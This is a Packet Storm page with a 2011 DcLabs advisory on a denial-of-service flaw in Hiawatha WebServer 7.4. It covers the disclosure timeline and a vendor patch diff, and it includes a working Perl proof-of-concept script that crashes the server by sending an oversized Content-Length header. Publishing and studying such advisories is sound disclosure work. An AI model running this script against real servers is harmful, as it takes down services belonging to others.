exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hiawatha WebServer 7.4 Denial Of Service

Hiawatha WebServer 7.4 Denial Of Service
Posted Mar 7, 2011
Authored by ipax | Site dclabs.com.br

Hiawatha WebServer version 7.4 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 80318ee6a80e3cdf8451955911b1bdd5b63a92301b713132026bb94ed35fbc6b

Hiawatha WebServer 7.4 Denial Of Service

Change Mirror Download
[Discussion]
- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]
- Hiawatha WebServer 7.4

[Vendor Product Description]
- Hiawatha is an open source webserver with a focus on security. I
started Hiawatha in January 2002. Before that time, I had used several
webservers, but I didn't like them. They had unlogical, almost cryptic
configuration syntax and none of them gave me a good feeling about
their security and robustness. So, I decided it was time to write my
own webserver. I never thought that my webserver would become what it
is today, but I enjoyed working on it and liked to have my own open
source project. In the years that followed, Hiawatha became a fully
functional webserver.

- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz

[Advisory Timeline]

- 02/24/2011 -> Advisory sent to vendor.
- 02/24/2011 -> Vendor response.
- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Content-Length entity-header filed miscalculation.

[Impact]

- Low

[Affected Version]

- 7.4
- Prior versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]

- The web server crashes while sending specially crafted HTTP requests
leading to Denial of Service.

[PoC]

# Hiawatha Web Server 7.4
#!/usr/bin/perl
use IO::Socket;
        if (@ARGV < 1) {
                usage();
        }
        $ip     = $ARGV[0];
        $port   = $ARGV[1];
        print "[+] Sending request...\n";
        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
        print $socket "OPTIONS * HTTP/1.1\r\n";
        print $socket "Host: http://www.dclabs.com.br\r\n";
        print $socket "Content-Length: 2147483599\r\n\r\n";
        sleep(3);
        close($socket);
        print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
        exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

-- hiawatha.c --

-- BEGIN --
20a21
> #include <limits.h>
421c422
<                                                       if
(content_length < 0) {
---
>                                       if ((content_length < 0) || (INT_MAX - content_length -2 <= header_length)) {
-- END --

[Greetz]

DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close